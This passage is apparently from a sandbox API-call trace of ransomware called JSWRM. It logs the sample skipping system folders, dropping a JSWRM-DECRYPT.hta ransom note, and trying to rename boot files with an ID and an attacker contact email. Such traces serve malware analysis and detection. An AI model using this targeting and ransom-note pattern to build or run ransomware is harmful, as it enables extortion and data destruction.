(lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.485] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.486] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.486] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.486] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.486] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.486] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.487] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.487] CloseHandle (hObject=0xffffffff) returned 1 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0064.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.487] MoveFileW (lpExistingFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\zh-HK\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.487] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.487] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.487] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2=".") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="..") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="...") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="windows") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="recovery") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="perflogs") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="documents and settings") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="$RECYCLE.BIN") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="system volume information") returned 1 [0064.488] lstrcmpiW (lpString1="zh-TW", lpString2="msocache") returned 1 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0064.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.488] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-tw\\jswrm-decrypt.hta")) returned 0xffffffff [0064.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0064.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237038 [0064.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.489] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-tw\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.489] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.489] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.508] CloseHandle (hObject=0x450) returned 1 [0064.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237038 | out: hHeap=0x1e0000) returned 1 [0064.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.510] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\zh-tw\\jswrm-decrypt.hta")) returned 0x20 [0064.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.510] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1d186442, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231fc0 [0064.510] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.510] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1d186442, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.510] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.510] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.510] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.510] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.510] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.511] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.511] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.511] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.511] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.512] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.512] CloseHandle (hObject=0xffffffff) returned 1 [0064.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0064.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.513] MoveFileW (lpExistingFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.513] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, 